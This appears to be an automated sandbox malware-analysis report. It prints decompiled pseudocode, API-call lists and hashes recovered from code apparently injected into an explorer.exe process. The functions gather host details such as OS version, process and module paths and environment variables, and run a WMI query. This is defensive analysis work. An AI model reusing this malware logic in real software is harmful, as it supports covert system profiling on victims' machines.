        • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
        • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
        				void _v44;
        				signed int _t8;
        				intOrPtr _t14;
        				intOrPtr _t15;
        				intOrPtr _t21;
        				void* _t24;
        				void* _t29;
        				void* _t35;
        
        				_t35 = __eflags;
        				_t24 = __ecx;
        				_t8 =  *0xde688; // 0xf0000
        				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
        				E000C85EF();
        				E000C8F78();
        				 *0xde780 = 0;
        				 *0xde784 = 0;
        				 *0xde77c = 0;
        				E000C5EB6(); // executed
        				E000CCF84(_t24);
        				_t14 =  *0xde688; // 0xf0000
        				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
        				_t15 =  *0xde688; // 0xf0000
        				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
        				E000CB337( &_v44);
        				memset( &_v44, 0, 0x27);
        				E000C5C26( &_v44, __fp0);
        				_t21 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
        				return 0;
        			}












        APIs
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
          • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
          • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
          • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
          • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
          • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        • memset.MSVCRT ref: 000C5D5F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 4245722550-0
        • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
        • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C861A(int _a4, intOrPtr _a8) {
        				int _t3;
        				intOrPtr _t4;
        				void* _t9;
        
        				_t3 = _a4;
        				if(_t3 == 0) {
        					return _t3;
        				}
        				_t9 =  *_t3;
        				if(_t9 != 0) {
        					 *_t3 =  *_t3 & 0x00000000;
        					_t4 = _a8;
        					if(_t4 != 0xffffffff) {
        						if(_t4 == 0xfffffffe) {
        							_t4 = E000CC392(_t9);
        						}
        					} else {
        						_t4 = E000CC379(_t9);
        					}
        					E000C874F(_t9, 0, _t4);
        					_t3 = HeapFree( *0xde768, 0, _t9); // executed
        				}
        				return _t3;
        			}







        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
        • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
        				signed int _t5;
        				void* _t6;
        				void* _t10;
        				long _t15;
        				void* _t17;
        
        				_t15 = 2;
        				_t5 = E000CA5F7(_a4, _t15);
        				_t17 = _t5;
        				if(_t17 != 0) {
        					_t6 = E000CA65C(_t17, _a8, _a12); // executed
        					if(_t6 != 0) {
        						CloseHandle(_t17);
        						return 0;
        					}
        					_t10 = 0xfffffffe;
        					return _t10;
        				}
        				return _t5 | 0xffffffff;
        			}









        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
        • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C98A6(void* __eflags, intOrPtr _a4) {
        				intOrPtr _t24;
        
        				_t24 = _a4;
        				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
        					CloseHandle( *(_t24 + 0x1c));
        					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
        					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
        						E000C984A(_t24, 1);
        					}
        					return  *((intOrPtr*)(_t24 + 0x18));
        				}
        				return 0;
        			}





        APIs
        • CloseHandle.KERNELBASE(?), ref: 000C98CA
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
        • Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
        • Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
        • Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CB337(void* __ecx) {
        				intOrPtr _t4;
        				void* _t5;
        				intOrPtr _t6;
        				void* _t12;
        				void* _t13;
        
        				_t4 =  *0xde684; // 0x64f8f0
        				_t13 = 0;
        				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
        				_t12 = _t5;
        				if(_t12 != 0) {
        					_t6 =  *0xde684; // 0x64f8f0
        					_push(_t12);
        					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
        						_t13 = 1;
        					}
        					CloseHandle(_t12);
        					return _t13;
        				}
        				return _t5;
        			}

        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
        • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 86%
        			E000CD01F(void* __fp0) {
        				char _v8;
        				char _v12;
        				char _v16;
        				struct _SYSTEM_INFO _v52;
        				char _v180;
        				char _v692;
        				char _v704;
        				char _v2680;
        				void* __esi;
        				struct _OSVERSIONINFOA* _t81;
        				intOrPtr _t83;
        				void* _t84;
        				long _t86;
        				intOrPtr* _t88;
        				intOrPtr _t90;
        				intOrPtr _t95;
        				intOrPtr _t97;
        				void* _t98;
        				intOrPtr _t103;
        				char* _t105;
        				void* _t108;
        				char _t115;
        				signed int _t117;
        				char _t119;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t130;
        				intOrPtr _t134;
        				intOrPtr _t147;
        				intOrPtr _t149;
        				intOrPtr _t152;
        				intOrPtr _t154;
        				signed int _t159;
        				struct HINSTANCE__* _t162;
        				short* _t164;
        				intOrPtr _t167;
        				WCHAR* _t168;
        				char* _t169;
        				intOrPtr _t181;
        				intOrPtr _t200;
        				void* _t215;
        				char _t218;
        				void* _t219;
        				char* _t220;
        				struct _OSVERSIONINFOA* _t222;
        				void* _t223;
        				int* _t224;
        				void* _t241;
        
        				_t241 = __fp0;
        				_t162 =  *0xde69c; // 0x10000000
        				_t81 = E000C8604(0x1ac4);
        				_t222 = _t81;
        				if(_t222 == 0) {
        					return _t81;
        				}
        				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
        				_t83 =  *0xde684; // 0x64f8f0
        				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
        				_t3 = _t222 + 0x648; // 0x648
        				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
        				_t5 = _t222 + 0x1644; // 0x1644
        				_t216 = _t5;
        				_t86 = GetModuleFileNameW(0, _t5, 0x105);
        				_t227 = _t86;
        				if(_t86 != 0) {
        					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
        				}
        				GetCurrentProcess();
        				_t88 = E000CBA05();
        				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
        				_t178 =  *_t88;
        				if(E000CBB8D( *_t88) == 0) {
        					_t90 = E000CBA62(_t178, _t222);
        					__eflags = _t90;
        					_t181 = (0 | _t90 > 0x00000000) + 1;
        					__eflags = _t181;
        					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
        				} else {
        					 *((intOrPtr*)(_t222 + 0x214)) = 3;
        				}
        				_t12 = _t222 + 0x220; // 0x220
        				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
        				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
        				_push( &_v16);
        				 *(_t222 + 0x224) = _t162;
        				_push( &_v8);
        				_v12 = 0x80;
        				_push( &_v692);
        				_v8 = 0x100;
        				_push( &_v12);
        				_t22 = _t222 + 0x114; // 0x114
        				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
        				_t95 =  *0xde68c; // 0x64fab8
        				_push(0);
        				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
        					GetLastError();
        				}
        				_t97 =  *0xde694; // 0x64fa48
        				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
        				_t26 = _t222 + 0x228; // 0x228
        				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
        				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
        				GetLastError();
        				_t31 = _t222 + 0x228; // 0x228
        				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
        				_t34 = _t222 + 0x114; // 0x114
        				_t103 = E000CB7A8(_t34,  &_v692);
        				_t35 = _t222 + 0xb0; // 0xb0
        				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
        				_push(_t35);
        				E000CB67D(_t103, _t35, _t98, _t241);
        				_t37 = _t222 + 0xb0; // 0xb0
        				_t105 = _t37;
        				_t38 = _t222 + 0xd0; // 0xd0
        				_t164 = _t38;
        				if(_t105 != 0) {
        					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
        					if(_t159 > 0) {
        						_t164[_t159] = 0;
        					}
        				}
        				_t41 = _t222 + 0x438; // 0x438
        				_t42 = _t222 + 0x228; // 0x228
        				E000C8FD8(_t42, _t41);
        				_t43 = _t222 + 0xb0; // 0xb0
        				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
        				_t44 = _t222 + 0x100c; // 0x100c
        				E000CB88A(_t108, _t44, _t241);
        				_t199 = GetCurrentProcess();
        				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
        				memset(_t222, 0, 0x9c);
        				_t224 = _t223 + 0xc;
        				_t222->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t222);
        				_t167 =  *0xde684; // 0x64f8f0
        				_t115 = 0;
        				_v8 = 0;
        				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
        					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
        					_t115 = _v8;
        				}
        				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
        				if(_t115 == 0) {
        					GetSystemInfo( &_v52);
        					_t117 = _v52.dwOemId & 0x0000ffff;
        				} else {
        					_t117 = 9;
        				}
        				_t54 = _t222 + 0x1020; // 0x1020
        				_t168 = _t54;
        				 *(_t222 + 0x9c) = _t117;
        				GetWindowsDirectoryW(_t168, 0x104);
        				_t119 = E000C95E1(_t199, 0x10c);
        				_t200 =  *0xde684; // 0x64f8f0
        				_t218 = _t119;
        				 *_t224 = 0x104;
        				_push( &_v704);
        				_push(_t218);
        				_v8 = _t218;
        				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
        					_t154 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
        				}
        				E000C85D5( &_v8);
        				_t124 =  *0xde684; // 0x64f8f0
        				_t61 = _t222 + 0x1434; // 0x1434
        				_t219 = _t61;
        				 *_t224 = 0x209;
        				_push(_t219);
        				_push(L"USERPROFILE");
        				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
        					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
        					_t152 =  *0xde684; // 0x64f8f0
        					_t224 =  &(_t224[5]);
        					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
        				}
        				_push(0x20a);
        				_t64 = _t222 + 0x122a; // 0x122a
        				_t169 = L"TEMP";
        				_t127 =  *0xde684; // 0x64f8f0
        				_push(_t169);
        				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
        					_t149 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
        				}
        				_push(0x40);
        				_t220 = L"SystemDrive";
        				_push( &_v180);
        				_t130 =  *0xde684; // 0x64f8f0
        				_push(_t220);
        				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
        					_t147 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
        				}
        				_v8 = 0x7f;
        				_t72 = _t222 + 0x199c; // 0x199c
        				_t134 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
        				_t75 = _t222 + 0x100c; // 0x100c
        				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
        				_t76 = _t222 + 0x1858; // 0x1858
        				E000D22D3( &_v2680, _t76, 0x20);
        				_t79 = _t222 + 0x1878; // 0x1878
        				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
        				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
        				return _t222;
        			}

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetCurrentProcessId.KERNEL32 ref: 000CD046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
        • GetCurrentProcess.KERNEL32 ref: 000CD09F
        • GetLastError.KERNEL32 ref: 000CD13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
        • GetLastError.KERNEL32 ref: 000CD172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
        • GetCurrentProcess.KERNEL32 ref: 000CD20E
        • memset.MSVCRT ref: 000CD229
        • GetVersionExA.KERNEL32(00000000), ref: 000CD234
        • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
        • GetSystemInfo.KERNEL32(?), ref: 000CD26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
        • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
        • Opcode Fuzzy Hash: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
        • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				void* _v28;
        				signed int _v32;
        				char _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				char _v48;
        				char _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				char* _v72;
        				signed short _v80;
        				signed int _v84;
        				char _v88;
        				char _v92;
        				char _v96;
        				intOrPtr _v100;
        				char _v104;
        				char _v616;
        				intOrPtr* _t159;
        				char _t165;
        				signed int _t166;
        				signed int _t173;
        				signed int _t178;
        				signed int _t186;
        				intOrPtr* _t187;
        				signed int _t188;
        				signed int _t192;
        				intOrPtr* _t193;
        				intOrPtr _t200;
        				intOrPtr* _t205;
        				signed int _t207;
        				signed int _t209;
        				intOrPtr* _t210;
        				intOrPtr _t212;
        				intOrPtr* _t213;
        				signed int _t214;
        				char _t217;
        				signed int _t218;
        				signed int _t219;
        				signed int _t230;
        				signed int _t235;
        				signed int _t242;
        				signed int _t243;
        				signed int _t244;
        				signed int _t245;
        				intOrPtr* _t247;
        				intOrPtr* _t251;
        				signed int _t252;
        				intOrPtr* _t253;
        				void* _t255;
        				intOrPtr* _t261;
        				signed int _t262;
        				signed int _t283;
        				signed int _t289;
        				char* _t298;
        				void* _t320;
        				signed int _t322;
        				intOrPtr* _t323;
        				intOrPtr _t324;
        				signed int _t327;
        				intOrPtr* _t328;
        				intOrPtr* _t329;
        
        				_v32 = _v32 & 0x00000000;
        				_v60 = _v60 & 0x00000000;
        				_v56 = __edx;
        				_v100 = __ecx;
        				_t159 = E000CD523(__ecx);
        				_t251 = _t159;
        				_v104 = _t251;
        				if(_t251 == 0) {
        					return _t159;
        				}
        				_t320 = E000C8604(0x10);
        				_v36 = _t320;
        				_pop(_t255);
        				if(_t320 == 0) {
        					L53:
        					E000C861A( &_v60, 0xfffffffe);
        					E000CD5D7( &_v104);
        					return _t320;
        				}
        				_t165 = E000C95E1(_t255, 0x536);
        				 *_t328 = 0x609;
        				_v52 = _t165;
        				_t166 = E000C95E1(_t255);
        				_push(0);
        				_push(_v56);
        				_v20 = _t166;
        				_push(_t166);
        				_push(_a4);
        				_t322 = E000C92E5(_t165);
        				_v60 = _t322;
        				E000C85D5( &_v52);
        				E000C85D5( &_v20);
        				_t329 = _t328 + 0x20;
        				if(_t322 != 0) {
        					_t323 = __imp__#2;
        					_v40 =  *_t323(_t322);
        					_t173 = E000C95E1(_t255, 0x9e4);
        					_v20 = _t173;
        					_v52 =  *_t323(_t173);
        					E000C85D5( &_v20);
        					_t324 = _v40;
        					_t261 =  *_t251;
        					_t252 = 0;
        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
        					__eflags = _t178;
        					if(_t178 != 0) {
        						L52:
        						__imp__#6(_t324);
        						__imp__#6(_v52);
        						goto L53;
        					}
        					_t262 = _v32;
        					_v28 = 0;
        					_v20 = 0;
        					__eflags = _t262;
        					if(_t262 == 0) {
        						L49:
        						 *((intOrPtr*)( *_t262 + 8))(_t262);
        						__eflags = _t252;
        						if(_t252 == 0) {
        							E000C861A( &_v36, 0);
        							_t320 = _v36;
        						} else {
        							 *(_t320 + 8) = _t252;
        							 *_t320 = E000C91E3(_v100);
        							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
        						}
        						goto L52;
        					} else {
        						goto L6;
        					}
        					while(1) {
        						L6:
        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
        						__eflags = _t186;
        						if(_t186 != 0) {
        							break;
        						}
        						_v16 = 0;
        						_v48 = 0;
        						_v12 = 0;
        						_v24 = 0;
        						__eflags = _v84;
        						if(_v84 == 0) {
        							break;
        						}
        						_t187 = _v28;
        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
        						__eflags = _t188;
        						if(_t188 >= 0) {
        							__imp__#20(_v24, 1,  &_v16);
        							__imp__#19(_v24, 1,  &_v48);
        							_t46 = _t320 + 0xc; // 0xc
        							_t253 = _t46;
        							_t327 = _t252 << 3;
        							_t47 = _t327 + 8; // 0x8
        							_t192 = E000C8698(_t327, _t47);
        							__eflags = _t192;
        							if(_t192 == 0) {
        								__imp__#16(_v24);
        								_t193 = _v28;
        								 *((intOrPtr*)( *_t193 + 8))(_t193);
        								L46:
        								_t252 = _v20;
        								break;
        							}
        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
        							_t200 =  *_t253;
        							__eflags =  *(_t327 + _t200 + 4);
        							if( *(_t327 + _t200 + 4) == 0) {
        								_t136 = _t320 + 0xc; // 0xc
        								E000C861A(_t136, 0);
        								E000C861A( &_v36, 0);
        								__imp__#16(_v24);
        								_t205 = _v28;
        								 *((intOrPtr*)( *_t205 + 8))(_t205);
        								_t320 = _v36;
        								goto L46;
        							}
        							_t207 = _v16;
        							while(1) {
        								_v12 = _t207;
        								__eflags = _t207 - _v48;
        								if(_t207 > _v48) {
        									break;
        								}
        								_v44 = _v44 & 0x00000000;
        								_t209 =  &_v12;
        								__imp__#25(_v24, _t209,  &_v44);
        								__eflags = _t209;
        								if(_t209 < 0) {
        									break;
        								}
        								_t212 = E000C91E3(_v44);
        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
        								_t213 = _v28;
        								_t281 =  *_t213;
        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
        								__eflags = _t214;
        								if(_t214 < 0) {
        									L39:
        									__imp__#6(_v44);
        									_t207 = _v12 + 1;
        									__eflags = _t207;
        									continue;
        								}
        								_v92 = E000C95E1(_t281, 0x250);
        								 *_t329 = 0x4cc;
        								_t217 = E000C95E1(_t281);
        								_t283 = _v80;
        								_v96 = _t217;
        								_t218 = _t283 & 0x0000ffff;
        								__eflags = _t218 - 0xb;
        								if(__eflags > 0) {
        									_t219 = _t218 - 0x10;
        									__eflags = _t219;
        									if(_t219 == 0) {
        										L35:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											L38:
        											E000C85D5( &_v92);
        											E000C85D5( &_v96);
        											__imp__#9( &_v80);
        											goto L39;
        										}
        										_push(_v72);
        										_push(L"%d");
        										L37:
        										_push(0xc);
        										_push(_t289);
        										E000C9640();
        										_t329 = _t329 + 0x10;
        										goto L38;
        									}
        									_t230 = _t219 - 1;
        									__eflags = _t230;
        									if(_t230 == 0) {
        										L33:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											goto L38;
        										}
        										_push(_v72);
        										_push(L"%u");
        										goto L37;
        									}
        									_t235 = _t230 - 1;
        									__eflags = _t235;
        									if(_t235 == 0) {
        										goto L33;
        									}
        									__eflags = _t235 == 1;
        									if(_t235 == 1) {
        										goto L33;
        									}
        									L28:
        									__eflags = _t283 & 0x00002000;
        									if((_t283 & 0x00002000) == 0) {
        										_v88 = E000C95E1(_t283, 0x219);
        										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
        										E000C85D5( &_v88);
        										_t329 = _t329 + 0x18;
        										_t298 =  &_v616;
        										L31:
        										_t242 = E000C91E3(_t298);
        										L32:
        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
        										goto L38;
        									}
        									_t242 = E000CDA20( &_v80);
        									goto L32;
        								}
        								if(__eflags == 0) {
        									__eflags = _v72 - 0xffff;
        									_t298 = L"TRUE";
        									if(_v72 != 0xffff) {
        										_t298 = L"FALSE";
        									}
        									goto L31;
        								}
        								_t243 = _t218 - 1;
        								__eflags = _t243;
        								if(_t243 == 0) {
        									goto L38;
        								}
        								_t244 = _t243 - 1;
        								__eflags = _t244;
        								if(_t244 == 0) {
        									goto L35;
        								}
        								_t245 = _t244 - 1;
        								__eflags = _t245;
        								if(_t245 == 0) {
        									goto L35;
        								}
        								__eflags = _t245 != 5;
        								if(_t245 != 5) {
        									goto L28;
        								}
        								_t298 = _v72;
        								goto L31;
        							}
        							__imp__#16(_v24);
        							_t210 = _v28;
        							 *((intOrPtr*)( *_t210 + 8))(_t210);
        							_t252 = _v20;
        							L42:
        							_t262 = _v32;
        							_t252 = _t252 + 1;
        							_v20 = _t252;
        							__eflags = _t262;
        							if(_t262 != 0) {
        								continue;
        							}
        							L48:
        							_t324 = _v40;
        							goto L49;
        						}
        						_t247 = _v28;
        						 *((intOrPtr*)( *_t247 + 8))(_t247);
        						goto L42;
        					}
        					_t262 = _v32;
        					goto L48;
        				} else {
        					E000C861A( &_v36, _t322);
        					_t320 = _v36;
        					goto L53;
        				}
        			}

        APIs
          • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
          • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
          • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
          • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
          • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
        • SysFreeString.OLEAUT32(?), ref: 000CDF82
        • SysFreeString.OLEAUT32(?), ref: 000CDF8B
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
